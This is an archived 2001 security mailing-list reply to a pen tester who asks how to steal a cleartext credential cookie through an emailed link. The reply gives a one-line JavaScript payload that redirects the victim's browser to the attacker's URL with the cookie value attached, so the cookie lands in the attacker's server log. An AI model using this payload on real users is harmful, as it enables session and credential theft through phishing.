Joe, >I'm working on a pen test for a web application. After >the first time you successfully authenticate, the app >stores a cookie with username and password in clear >text. I've recently read the archive regarding >vulnerable IE browsers revealing cookies. I'd like to >go a step farther. Does anyone have a script that will >email the cookie? I'd like to craft an email with a link >and when a user clicks, it emails the cookie. .. not really necessary .. javascript:location.href=yoururl?[found cookie value] .. creates log-file entry with cookie value on (hopefully)your server ... rC securityat_private http://www.freefly.com/security/ _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:18:44 PST